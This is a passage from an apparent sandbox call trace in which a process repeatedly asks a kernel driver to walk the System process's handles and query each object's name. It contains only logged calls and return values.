ObfDereferenceObject (Object=0xffffe000694b9390) returned 0x7ff2 [0256.701] IoCompleteRequest () returned 0x0 [0256.701] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x80, lpOverlapped=0x0) returned 1 [0256.701] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.701] PsAcquireProcessExitSynchronization () returned 0x0 [0256.701] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.701] ObReferenceObjectByHandle (in: Handle=0xffffffff8000027c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069574b70, HandleInformation=0x0) returned 0x0 [0256.701] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.701] PsReleaseProcessExitSynchronization () returned 0x2 [0256.701] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa81 [0256.701] ObQueryNameString (in: Object=0xffffe00069574b70, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.701] ObfDereferenceObject (Object=0xffffe00069574b70) returned 0x7fef [0256.701] IoCompleteRequest () returned 0x0 [0256.701] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x80, lpOverlapped=0x0) returned 1 [0256.701] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.701] PsAcquireProcessExitSynchronization () returned 0x0 [0256.701] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.701] ObReferenceObjectByHandle (in: Handle=0xffffffff80000280, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007bc02450, HandleInformation=0x0) returned 0x0 [0256.701] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.701] PsReleaseProcessExitSynchronization () returned 0x2 [0256.701] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa80 [0256.701] ObQueryNameString (in: Object=0xffffe0007bc02450, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.701] ObfDereferenceObject (Object=0xffffe0007bc02450) returned 0x7ffd [0256.701] IoCompleteRequest () returned 0x0 [0256.701] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xcc, lpOverlapped=0x0) returned 1 [0256.701] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.701] PsAcquireProcessExitSynchronization () returned 0x0 [0256.701] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.701] ObReferenceObjectByHandle (in: Handle=0xffffffff80000288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069546530, HandleInformation=0x0) returned 0x0 [0256.701] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.701] PsReleaseProcessExitSynchronization () returned 0x2 [0256.702] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa7f [0256.702] ObQueryNameString (in: Object=0xffffe00069546530, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.702] ObfDereferenceObject (Object=0xffffe00069546530) returned 0x8000 [0256.702] IoCompleteRequest () returned 0x0 [0256.702] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x116, lpOverlapped=0x0) returned 1 [0256.702] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.702] PsAcquireProcessExitSynchronization () returned 0x0 [0256.702] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.702] ObReferenceObjectByHandle (in: Handle=0xffffffff8000028c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000695743c0, HandleInformation=0x0) returned 0x0 [0256.702] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.702] PsReleaseProcessExitSynchronization () returned 0x2 [0256.702] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa7e [0256.702] ObQueryNameString (in: Object=0xffffe000695743c0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.702] ObfDereferenceObject (Object=0xffffe000695743c0) returned 0x8000 [0256.702] IoCompleteRequest () returned 0x0 [0256.702] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x116, lpOverlapped=0x0) returned 1 [0256.702] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.702] PsAcquireProcessExitSynchronization () returned 0x0 [0256.702] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.702] ObReferenceObjectByHandle (in: Handle=0xffffffff80000290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069548430, HandleInformation=0x0) returned 0x0 [0256.702] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.702] PsReleaseProcessExitSynchronization () returned 0x2 [0256.702] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa7d [0256.702] ObQueryNameString (in: Object=0xffffe00069548430, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.702] ObfDereferenceObject (Object=0xffffe00069548430) returned 0x8000 [0256.702] IoCompleteRequest () returned 0x0 [0256.702] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.702] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.702] PsAcquireProcessExitSynchronization () returned 0x0 [0256.702] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.702] ObReferenceObjectByHandle (in: Handle=0xffffffff80000298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069548cd0, HandleInformation=0x0) returned 0x0 [0256.702] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.702] PsReleaseProcessExitSynchronization () returned 0x2 [0256.702] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa7c [0256.702] ObQueryNameString (in: Object=0xffffe00069548cd0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.702] ObfDereferenceObject (Object=0xffffe00069548cd0) returned 0x7fff [0256.702] IoCompleteRequest () returned 0x0 [0256.703] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0256.703] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.703] PsAcquireProcessExitSynchronization () returned 0x0 [0256.703] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.703] ObReferenceObjectByHandle (in: Handle=0xffffffff8000029c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069548a60, HandleInformation=0x0) returned 0x0 [0256.703] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.703] PsReleaseProcessExitSynchronization () returned 0x2 [0256.703] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa7b [0256.703] ObQueryNameString (in: Object=0xffffe00069548a60, ObjectNameInfo=0xffffe0006a6c07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6c07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.703] ObfDereferenceObject (Object=0xffffe00069548a60) returned 0x8000 [0256.703] IoCompleteRequest () returned 0x0 [0256.703] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0256.703] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.703] PsAcquireProcessExitSynchronization () returned 0x0 [0256.703] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.703] ObReferenceObjectByHandle (in: Handle=0xffffffff800002a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000693e7090, HandleInformation=0x0) returned 0x0 [0256.703] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.703] PsReleaseProcessExitSynchronization () returned 0x2 [0256.703] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa7a [0256.703] ObQueryNameString (in: Object=0xffffe000693e7090, ObjectNameInfo=0xffffe0006a2cb4c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2cb4c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.703] ObfDereferenceObject (Object=0xffffe000693e7090) returned 0x7ffe [0256.703] IoCompleteRequest () returned 0x0 [0256.703] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x3e, lpOverlapped=0x0) returned 1 [0256.703] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.703] PsAcquireProcessExitSynchronization () returned 0x0 [0256.703] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.703] ObReferenceObjectByHandle (in: Handle=0xffffffff800002b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001478ecf00, HandleInformation=0x0) returned 0x0 [0256.703] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.703] PsReleaseProcessExitSynchronization () returned 0x2 [0256.703] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa79 [0256.703] ObQueryNameString (in: Object=0xffffc001478ecf00, ObjectNameInfo=0xffffe000685c67c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000685c67c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.703] ObfDereferenceObject (Object=0xffffc001478ecf00) returned 0x8002 [0256.703] IoCompleteRequest () returned 0x0 [0256.703] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x78, lpOverlapped=0x0) returned 1 [0256.703] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.703] PsAcquireProcessExitSynchronization () returned 0x0 [0256.703] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.703] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069533830, HandleInformation=0x0) returned 0x0 [0256.703] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.704] PsReleaseProcessExitSynchronization () returned 0x2 [0256.704] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa78 [0256.704] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5164c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a5164c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0256.704] ObfDereferenceObject (Object=0xffffe00069533830) returned 0x7f1d [0256.704] IoCompleteRequest () returned 0x0 [0256.704] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x88, lpOverlapped=0x0) returned 1 [0256.704] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.704] PsAcquireProcessExitSynchronization () returned 0x0 [0256.704] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.704] ObReferenceObjectByHandle (in: Handle=0xffffffff800002ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000730deca0, HandleInformation=0x0) returned 0x0 [0256.704] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.704] PsReleaseProcessExitSynchronization () returned 0x2 [0256.704] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa77 [0256.704] ObQueryNameString (in: Object=0xffffe000730deca0, ObjectNameInfo=0xffffe0006a43b7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a43b7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.704] ObfDereferenceObject (Object=0xffffe000730deca0) returned 0x8000 [0256.704] IoCompleteRequest () returned 0x0 [0256.704] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x82, lpOverlapped=0x0) returned 1 [0256.704] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.704] PsAcquireProcessExitSynchronization () returned 0x0 [0256.704] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.704] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069533570, HandleInformation=0x0) returned 0x0 [0256.704] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.704] PsReleaseProcessExitSynchronization () returned 0x2 [0256.704] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa76 [0256.704] ObQueryNameString (in: Object=0xffffe00069533570, ObjectNameInfo=0xffffe0006a604704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a604704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.704] ObfDereferenceObject (Object=0xffffe00069533570) returned 0x7ffa [0256.704] IoCompleteRequest () returned 0x0 [0256.704] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x82, lpOverlapped=0x0) returned 1 [0256.704] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.704] PsAcquireProcessExitSynchronization () returned 0x0 [0256.704] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.704] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000695332b0, HandleInformation=0x0) returned 0x0 [0256.704] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.704] PsReleaseProcessExitSynchronization () returned 0x2 [0256.704] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa75 [0256.704] ObQueryNameString (in: Object=0xffffe000695332b0, ObjectNameInfo=0xffffe000690237c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690237c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.704] ObfDereferenceObject (Object=0xffffe000695332b0) returned 0x7ffd [0256.704] IoCompleteRequest () returned 0x0 [0256.705] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x36, lpOverlapped=0x0) returned 1 [0256.705] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.705] PsAcquireProcessExitSynchronization () returned 0x0 [0256.705] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.705] ObReferenceObjectByHandle (in: Handle=0xffffffff80000328, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00147826f20, HandleInformation=0x0) returned 0x0 [0256.705] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.705] PsReleaseProcessExitSynchronization () returned 0x2 [0256.705] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa74 [0256.705] ObQueryNameString (in: Object=0xffffc00147826f20, ObjectNameInfo=0xffffe0006a9af044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a9af044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.705] ObfDereferenceObject (Object=0xffffc00147826f20) returned 0x8001 [0256.705] IoCompleteRequest () returned 0x0 [0256.705] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8c, lpOverlapped=0x0) returned 1 [0256.705] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.705] PsAcquireProcessExitSynchronization () returned 0x0 [0256.705] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.705] ObReferenceObjectByHandle (in: Handle=0xffffffff80000340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067ebb090, HandleInformation=0x0) returned 0x0 [0256.705] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.705] PsReleaseProcessExitSynchronization () returned 0x2 [0256.705] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa73 [0256.705] ObQueryNameString (in: Object=0xffffe00067ebb090, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.705] ObfDereferenceObject (Object=0xffffe00067ebb090) returned 0x800f [0256.705] IoCompleteRequest () returned 0x0 [0256.705] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x2a, lpOverlapped=0x0) returned 1 [0256.705] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.705] PsAcquireProcessExitSynchronization () returned 0x0 [0256.705] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.705] ObReferenceObjectByHandle (in: Handle=0xffffffff80000478, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067e59240, HandleInformation=0x0) returned 0x0 [0256.705] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.705] PsReleaseProcessExitSynchronization () returned 0x2 [0256.705] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa72 [0256.705] ObQueryNameString (in: Object=0xffffe00067e59240, ObjectNameInfo=0xffffe0006a65b044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a65b044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.705] ObfDereferenceObject (Object=0xffffe00067e59240) returned 0x7ff3 [0256.705] IoCompleteRequest () returned 0x0 [0256.705] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x2a, lpOverlapped=0x0) returned 1 [0256.705] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.705] PsAcquireProcessExitSynchronization () returned 0x0 [0256.705] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.705] ObReferenceObjectByHandle (in: Handle=0xffffffff80000494, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696c4090, HandleInformation=0x0) returned 0x0 [0256.705] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.706] PsReleaseProcessExitSynchronization () returned 0x2 [0256.706] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa71 [0256.706] ObQueryNameString (in: Object=0xffffe000696c4090, ObjectNameInfo=0xffffe0006a50f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a50f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0256.706] ObfDereferenceObject (Object=0xffffe000696c4090) returned 0x7ffa [0256.706] IoCompleteRequest () returned 0x0 [0256.706] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x8a, lpOverlapped=0x0) returned 1 [0256.706] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0256.706] PsAcquireProcessExitSynchronization () returned 0x0 [0256.706] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0256.706] ObReferenceObjectByHandle (in: Handle=0xffffffff800004b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000693de980, HandleInformation=0x0) returned 0x0 [0256.706] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0256.706] PsReleaseProcessExitSynchronization () returned 0x2 [0256.706] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa70 [0256.706] 